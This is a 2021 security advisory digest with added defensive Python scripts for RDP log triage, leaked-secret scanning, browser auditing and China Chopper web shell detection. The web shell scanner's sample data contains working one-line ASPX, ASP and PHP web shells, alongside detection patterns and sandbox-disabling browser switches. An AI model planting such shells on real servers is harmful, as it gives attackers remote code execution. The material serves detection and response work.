Please see Security Advisories for the week ending April 16, 2021
- FBI Issues Alert on Mamba Ransomware
- Zero-Day Exploit for Google Chrome and Microsoft Edge
- New Palo Alto Networks Security Advisories
- Google Releases Security Updates for Chrome
- Apply Microsoft April 2021 Security Updates to Mitigate Newly Disclosed Microsoft Exchange Vulnerabilities
- Updates on Microsoft Exchange Server Vulnerabilities
________________________________
FBI Issues Alert on Mamba Ransomware
Situation
The FBI has issued a warning about Mamba ransomware, which weaponizes DiskCryptor, a legitimate open-source full-disk encryption tool.
Problem
Mamba intrusions begin with access to a system through exposed RDP or other insecurely configured remote-access services. The ransomware then drops a set of files, installs DiskCryptor, and begins encrypting the system's disk.
Implication
Once DiskCryptor finishes, the system is locked and a ransom is demanded for the decryption key. While encryption is still in progress the key is written in cleartext to the configuration file "myConf.txt"; if the attack is detected at that early stage, the key can be recovered from that file.
Need
If an organization does not use DiskCryptor, it should block the software with application control (add it to the blocklist). Other mitigations include segmenting the network, requiring administrator credentials to install software, disabling unused RDP ports and monitoring RDP logs, and using secure networks and VPNs.
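Two of the mitigations above, monitoring RDP logs and blocking DiskCryptor where it is not sanctioned, can be turned into concrete checks. The following is an added example, not part of the FBI alert: it flags successful RDP logons from internet addresses, sources with repeated failed RDP logons, and file paths that match DiskCryptor components. The events are constructed here as dicts shaped like Windows Security log records; only myConf.txt is named in the alert, while the dc* file names are DiskCryptor's own component names and assume the attacker did not rename them.

```python
"""Triage checks for the Mamba / DiskCryptor pattern described above.

Added example; not part of the FBI alert. Two of the alert's mitigations are
"monitor RDP logs" and "block DiskCryptor where it is not used"; the functions
below do both over structured input. Events are constructed here as dicts in
the shape of Windows Security log records (EventID 4624 = successful logon,
4625 = failed logon, LogonType 10 = RemoteInteractive, i.e. RDP). In practice
they would come from a SIEM or from Get-WinEvent output converted to JSON.
"""
import ipaddress
from collections import Counter
from pathlib import PureWindowsPath

# Constructed sample events, not real telemetry. 91.200.100.23 stands in for an
# arbitrary internet address; 10.20.0.15 is an internal jump host.
SAMPLE_EVENTS = [
    {"EventID": 4625, "LogonType": 10, "IpAddress": "91.200.100.23", "TargetUserName": "administrator"},
    {"EventID": 4625, "LogonType": 10, "IpAddress": "91.200.100.23", "TargetUserName": "admin"},
    {"EventID": 4625, "LogonType": 10, "IpAddress": "91.200.100.23", "TargetUserName": "backup"},
    {"EventID": 4624, "LogonType": 10, "IpAddress": "91.200.100.23", "TargetUserName": "backup"},
    {"EventID": 4624, "LogonType": 10, "IpAddress": "10.20.0.15", "TargetUserName": "helpdesk"},
    {"EventID": 4624, "LogonType": 7, "IpAddress": "-", "TargetUserName": "jsmith"},
]


def is_internet_address(ip):
    """True for an internet-routable source; False for RFC1918, loopback and the
    '-' that Windows writes for local logons."""
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:
        return False


def external_rdp_logons(events):
    """Successful RDP logons from internet addresses: evidence that RDP is exposed
    and used from outside, the entry point the alert describes."""
    return [e for e in events
            if e["EventID"] == 4624 and e["LogonType"] == 10
            and is_internet_address(e["IpAddress"])]


def rdp_bruteforce_sources(events, threshold=3):
    """Source addresses with at least `threshold` failed RDP logons, with the count."""
    failures = Counter(e["IpAddress"] for e in events
                       if e["EventID"] == 4625 and e["LogonType"] == 10)
    return {ip: n for ip, n in failures.items() if n >= threshold}


# File names to block or alert on where DiskCryptor is not sanctioned. myConf.txt is
# named in the alert (it holds the key while encryption is in progress); the dc* names
# are DiskCryptor's own GUI, console, installer, API library and driver (assumption:
# the attacker did not rename them).
DISKCRYPTOR_NAMES = {"myconf.txt", "dcrypt.exe", "dccon.exe", "dcinst.exe", "dcapi.dll", "dcrypt.sys"}


def diskcryptor_artifacts(paths):
    """Paths whose file name matches a DiskCryptor component (case-insensitive)."""
    return [p for p in paths if PureWindowsPath(p).name.lower() in DISKCRYPTOR_NAMES]
```

On the sample data, `external_rdp_logons` returns the one external success (the "backup" account, right after three failures from the same address), `rdp_bruteforce_sources` returns that address with a count of 3, and the artifact check matches myConf.txt and the DiskCryptor driver but not notepad.exe. Finding myConf.txt on a host that does not use DiskCryptor is the cue to copy it out immediately, since it is only readable before encryption completes.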
________________________________
Zero-Day Exploit for Google Chrome and Microsoft Edge
Situation
A security researcher has published on Twitter a proof-of-concept exploit for a zero-day remote code execution vulnerability (Chromium bug 1195777) that works against the current versions of Google Chrome and Microsoft Edge, and likely other Chromium-based browsers. A zero-day vulnerability is one that becomes publicly known, or is exploited, before the vendor has shipped a fix for the released version of the affected software.
Problem
The PoC was also uploaded to GitHub, together with a video demonstrating code execution against Google Chrome version 89.0.4389.128. The exploit runs inside the renderer process and does not escape Chromium's sandbox, which confines a compromised renderer so that it cannot run arbitrary programs or read files on the host. To fully compromise a system, an attacker would have to chain this vulnerability with a separate sandbox-escape exploit.
Implication
If an attacker succeeds, either by chaining this vulnerability with a sandbox escape or because the browser was running with the sandbox disabled (for example, launched with --no-sandbox), they could take control of the affected system.
Need
At the time of writing, no patch has been released for this vulnerability. With the sandbox enabled, which is the default, the published PoC on its own cannot harm users. Update Google Chrome and Microsoft Edge as soon as fixed versions are available, and do not run browsers with the sandbox disabled. Additional information can be found at the link below.
For a brief overview:
https://www.secpod.com/blog/second-zero-day-exploit-for-google-chrome-in-the-same-week/
________________________________
New Palo Alto Networks Security Advisories
Situation
Palo Alto Networks has released four security advisories covering vulnerabilities in PAN-OS, the GlobalProtect app, and Bridgecrew Checkov.
Problem
PAN-OS: Two information-disclosure vulnerabilities write secrets to the system logs and administrator secrets to the web server logs.
GlobalProtect: A denial-of-service vulnerability was found in the Windows app.
Bridgecrew Checkov: An arbitrary code execution vulnerability was found when Checkov processes a malicious Terraform file.
Implication
PAN-OS: Secrets are recorded in cleartext in system logs and web server logs, where anyone with access to those logs, or to copies of them, can read them.
GlobalProtect: An attacker can send specially crafted input to the app that crashes Windows (a Blue Screen of Death).
Bridgecrew Checkov: An attacker who can get a malicious Terraform file scanned by Checkov can execute code on the host running the scan, for example a CI runner.
Need
Update the affected products to the fixed versions listed in the advisories.
For a more detailed description:
https://security.paloaltonetworks.com/
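Patching the PAN-OS logging issues stops new leakage, but every existing copy of the affected logs (on the firewall, in Panorama, in the SIEM, in backups) still contains the secrets, so the follow-up is to find what leaked and rotate it. The following scanner is an added example, not Palo Alto Networks code: it reports log lines that carry credential-like material and redacts them so the report does not re-leak anything. The patterns are generic key=value, Authorization-header and URL-credential shapes rather than a PAN-OS-specific signature, and the log lines are constructed.

```python
"""Find cleartext secrets in exported log text.

Added example; not Palo Alto Networks code. Reports the lines that carry
credential-like material, redacted, so the affected accounts can be rotated.
Patterns are generic; the sample log below is constructed, not real PAN-OS output.
"""
import base64
import re

SECRET_PATTERNS = {
    # password=..., passwd: ..., secret=...  (value stops at whitespace or quotes)
    "password-kv": re.compile(r"(?i)\b(pass(?:word|wd|phrase)?|pwd|secret)\s*[=:]\s*([^\s\"',;]+)"),
    # Authorization: Basic <token> / Bearer <token>
    "auth-header": re.compile(r"(?i)\bauthorization:\s*(basic|bearer)\s+([A-Za-z0-9+/=_.\-]+)"),
    # scheme://user:password@host
    "url-credential": re.compile(r"(?i)\b[a-z][a-z0-9+.\-]*://([^/\s:@]+):([^/\s@]+)@"),
    # api_key=<long token>, token=<long token>
    "api-key-kv": re.compile(r"(?i)\b(api[_-]?key|token)\s*[=:]\s*([A-Za-z0-9_\-]{16,})"),
}


def _mask(match):
    """Replace the last captured group (the secret itself) inside the whole match."""
    last = match.lastindex
    start = match.start(last) - match.start(0)
    end = match.end(last) - match.start(0)
    whole = match.group(0)
    return whole[:start] + "[REDACTED]" + whole[end:]


def redact(line):
    """Mask the secret part of every pattern match in a line; usernames stay visible."""
    for pattern in SECRET_PATTERNS.values():
        line = pattern.sub(_mask, line)
    return line


def scan(text):
    """Return [(line_number, kind, redacted_line)] for each line that carries a secret."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        for kind, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                findings.append((number, kind, redact(line)))
                break
    return findings


def basic_auth_user(token):
    """Username from a Basic Authorization token (the account that must be rotated)."""
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return decoded.split(":", 1)[0] if ":" in decoded else None


# Constructed sample log lines (not real PAN-OS output).
SAMPLE_LOG = """\
2021-04-14 09:12:01 mgmtsrvr: user admin logged in from 10.0.0.5
2021-04-14 09:12:07 mgmtsrvr: cmd="set mgt-config users ops password=Sup3rS3cret!"
2021-04-14 09:13:44 sslvpn: POST /ssl-vpn/login.esp user=jdoe passwd=Winter2021
2021-04-14 09:14:02 appweb: GET /api/?type=keygen&user=svc&password=Hunter2 HTTP/1.1 200
2021-04-14 09:15:30 appweb: Authorization: Basic YWRtaW46cGFzc3dvcmQ=
2021-04-14 09:15:58 mgmtsrvr: ldap bind uri=ldaps://svc_bind:Bind!Pass@ldap.corp.example:636
2021-04-14 09:16:11 mgmtsrvr: commit succeeded by admin
"""

if __name__ == "__main__":
    for number, kind, line in scan(SAMPLE_LOG):
        print(f"line {number} [{kind}]: {line}")
```

On the sample, lines 2 to 6 are reported and line 1 and 7 are not; the redacted output keeps the account names (ops, jdoe, svc, svc_bind) so the rotation list can be built from it, and `basic_auth_user` recovers "admin" from the Basic token. Run it against `less`-exported or syslog-forwarded copies of the logs, not only the firewall's own, since the advisory's point is that the secrets are wherever the logs went.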
________________________________
Google Releases Security Updates for Chrome
Situation
Google has updated the Chrome stable channel to 90.0.4430.72 for Windows, Mac, and Linux. This release also makes the address bar default to HTTPS: a URL typed without a scheme is now tried over HTTPS first rather than HTTP.
Problem
The release fixes 37 security vulnerabilities, some of which could allow an attacker to compromise a system and take remote control of it. Google is restricting access to the bug details until a majority of users have had the opportunity to update.
Implication
The vulnerabilities addressed in this update could be exploited by an attacker to take control of an affected system.
Need
CISA encourages administrators and users to review Google's release notes and apply the update.
Google credits the external researchers who reported these vulnerabilities, as well as the security researchers whose work prevented other bugs from reaching the stable channel.
For a brief description:
https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_14.html
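Two checks follow from the Chrome items above: whether the installed build is at or above the fixed stable version, and whether any browser is running with the sandbox disabled, which is the condition under which the renderer-only PoC in the earlier item becomes full code execution on the host. The following is an added example, not Google's or Microsoft's code. The inventory records are constructed; the minimum version is the 90.0.4430.72 build named above, no fixed Edge build is given on this page so Edge gets only the sandbox check, and the sandbox switches are real Chromium command-line flags.

```python
"""Browser-fleet checks for the Chrome items above.

Added example, not Google's or Microsoft's code. It does two things:
1. compares Chromium version strings numerically (four dotted integers);
   comparing them as strings gets "90.0.4430.9" > "90.0.4430.72" wrong.
2. flags browser processes started with switches that turn Chromium's sandbox
   off; with the sandbox off, a renderer-only exploit is code execution on the host.
Inventory records are constructed; in practice they would come from an EDR or
asset-management export.
"""

# Minimum fixed versions. Only the Chrome stable build named in the advisory is
# known here; no fixed Edge build is given on this page, so Edge (None) gets no
# version check, only the sandbox check.
MINIMUM_VERSIONS = {"chrome": "90.0.4430.72", "msedge": None}

# Real Chromium command-line switches that disable or weaken the sandbox.
SANDBOX_SWITCHES = {"--no-sandbox", "--disable-setuid-sandbox", "--disable-gpu-sandbox"}


def parse_version(version):
    """'90.0.4430.72' -> (90, 0, 4430, 72); raises ValueError on non-numeric parts."""
    return tuple(int(part) for part in version.strip().split("."))


def is_at_least(installed, minimum):
    """Numeric comparison of dotted versions (tuples compare element by element)."""
    return parse_version(installed) >= parse_version(minimum)


def sandbox_disabled(cmdline):
    """cmdline: list of argv tokens. Handles both '--flag' and '--flag=value' forms."""
    return any(token.split("=", 1)[0] in SANDBOX_SWITCHES for token in cmdline)


def audit(inventory, minimums=MINIMUM_VERSIONS):
    """inventory: list of {host, browser, version, cmdline}. Returns finding strings."""
    findings = []
    for rec in inventory:
        minimum = minimums.get(rec["browser"])
        if minimum and not is_at_least(rec["version"], minimum):
            findings.append(f"{rec['host']}: {rec['browser']} {rec['version']} is below {minimum}")
        if sandbox_disabled(rec["cmdline"]):
            findings.append(f"{rec['host']}: {rec['browser']} is running with the sandbox disabled")
    return findings


# Constructed inventory (not real hosts).
SAMPLE_INVENTORY = [
    {"host": "ws-01", "browser": "chrome", "version": "89.0.4389.128",
     "cmdline": ["chrome.exe"]},
    {"host": "ws-02", "browser": "chrome", "version": "90.0.4430.72",
     "cmdline": ["chrome.exe"]},
    {"host": "kiosk-07", "browser": "chrome", "version": "90.0.4430.72",
     "cmdline": ["chrome", "--kiosk", "--no-sandbox", "https://intranet.example"]},
    {"host": "ws-03", "browser": "msedge", "version": "90.0.818.39",
     "cmdline": ["msedge.exe", "--profile-directory=Default"]},
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_INVENTORY):
        print(finding)
```

The audit reports ws-01 for being below 90.0.4430.72 and kiosk-07 for running with --no-sandbox (a common shortcut in kiosk and CI setups); ws-02 is clean and ws-03 gets no version verdict because no fixed Edge build is known from this page. Note that being on 90.0.4430.72 says nothing about the separate zero-day in the earlier item, which had no fix at the time of writing.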
________________________________
Apply Microsoft April 2021 Security Updates to Mitigate Newly Disclosed Microsoft Exchange Vulnerabilities
Situation
Microsoft's April 2021 security update release includes fixes for vulnerabilities in Exchange Server 2016 and other Microsoft products.
Problem
The release addresses a large number of security vulnerabilities, including newly disclosed ones in Exchange Server 2016, as well as vulnerabilities in other Microsoft products.
Implication
Attackers who exploit these vulnerabilities can gain access to the target host and establish persistence on it.
Need
Apply the latest Microsoft updates for all Microsoft products.
For a more detailed description:
https://msrc.microsoft.com/update-guide/releaseNote/2021-Apr
________________________________
Updates on Microsoft Exchange Server Vulnerabilities
Situation
The Cybersecurity and Infrastructure Security Agency (CISA) has added two new Malware Analysis Reports (MARs) to Alert AA21-062A, Microsoft Exchange Server Vulnerabilities.
Problem
CISA and its partners have observed two malware families deployed through exploitation of the Microsoft Exchange Server vulnerabilities. The first, MAR-10331466-1.v1, covers DearCry ransomware, which encrypts files on a device and demands a ransom in exchange for decrypting them. The second, MAR-10330097-1.v1, covers the China Chopper web shell, a web-based shell interface that may allow an attacker to remotely run JavaScript code on a compromised Exchange Server.
Implication
Successful exploitation of these vulnerabilities allows an attacker to run arbitrary code on vulnerable Exchange Servers, giving persistent access to the system, to the mailboxes and files on it, and to any credentials stored on it. It may also enable the attacker to compromise trust and identity in the affected network.
Need
CISA recommends that administrators and users review the following resources for remediation and mitigation plans:
Mitigate Exchange Server Vulnerabilities
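The China Chopper web shell in the second MAR is small enough to find by its shape: a one-line server-side page that hands a request parameter straight to the script engine's eval, so the operator's "password" is just the parameter name. The following scanner is an added example, not CISA's code or part of MAR-10330097-1.v1: it matches the ASPX/JScript form seen on Exchange (eval(Request.Item["..."],"unsafe")) plus the classic ASP and PHP forms, and returns the parameter name so responders can search IIS logs for requests carrying it. The default directory to walk assumes a standard Exchange install path; the sample file contents are constructed.

```python
"""Scan Exchange web content for China Chopper-style web shells.

Added example; not CISA's code. China Chopper hands a request parameter to the
server-side eval, so the operator's "password" is the parameter name. On Exchange
the shell is an ASPX page in JScript:  <%eval(Request.Item["p"],"unsafe");%>
Sample file contents below are constructed. DEFAULT_ROOT assumes a default install.
"""
import os
import re

WEBSHELL_PATTERNS = {
    # ASPX/JScript: eval(Request.Item["p"],"unsafe")  or  eval(Request["p"],"unsafe")
    "aspx-jscript-eval": re.compile(
        r'eval\s*\(\s*Request(?:\.Item)?\s*\[\s*"([^"]+)"\s*\]\s*,\s*"unsafe"\s*\)', re.I),
    # Classic ASP/VBScript: eval request("p")  or  execute request("p")
    "asp-eval-request": re.compile(
        r'\b(?:eval|execute)\s*\(?\s*request\s*\(\s*"([^"]+)"\s*\)', re.I),
    # PHP: @eval($_POST['p']);
    "php-eval-post": re.compile(
        r'@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[\s*[\'"]([^\'"]+)[\'"]\s*\]\s*\)', re.I),
}

SCAN_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".php"}
# Assumed default Exchange install path; adjust for non-default installs.
DEFAULT_ROOT = r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy"


def inspect(path, content):
    """Return a finding dict if content matches a web shell pattern, else None."""
    for kind, pattern in WEBSHELL_PATTERNS.items():
        match = pattern.search(content)
        if match:
            return {"path": path, "kind": kind, "param": match.group(1)}
    return None


def scan_files(files):
    """files: iterable of (path, content) pairs. Returns the list of findings."""
    findings = []
    for path, content in files:
        finding = inspect(path, content)
        if finding:
            findings.append(finding)
    return findings


def scan_tree(root=DEFAULT_ROOT):
    """Walk a directory and scan every script file under it (reads from disk)."""
    def read_all():
        for dirpath, _, names in os.walk(root):
            for name in names:
                if os.path.splitext(name)[1].lower() in SCAN_EXTENSIONS:
                    full = os.path.join(dirpath, name)
                    with open(full, encoding="utf-8", errors="ignore") as fh:
                        yield full, fh.read()
    return scan_files(read_all())


# Constructed sample contents (paths use the default owa\auth drop location).
OWA_AUTH = DEFAULT_ROOT + r"\owa\auth"
SAMPLE_FILES = [
    (OWA_AUTH + r"\logon.aspx",
     '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>'),
    (OWA_AUTH + r"\errorFE.aspx",  # legitimate page: client-side JS eval is not a shell
     '<%@ Page Language="C#" AutoEventWireup="true" %>\n'
     '<script>var s = eval(JSON.stringify(data));</script>'),
    (OWA_AUTH + r"\current\themes\resources\shell.asp", '<%eval request("cmd")%>'),
    (r"C:\inetpub\wwwroot\legacy\x.php", "<?php @eval($_POST['z']); ?>"),
]

if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES):
        print(f"{finding['path']}: {finding['kind']} (param={finding['param']})")
```

On the sample set the scanner flags logon.aspx (ASPX/JScript, parameter "pass"), shell.asp and x.php, and leaves the legitimate C# page alone even though it contains a client-side eval. Pattern matching of this kind catches the unobfuscated shells the MAR describes; a shell that base64-encodes or splits its eval call needs behavioural detection (w3wp.exe spawning cmd.exe or powershell.exe) in addition.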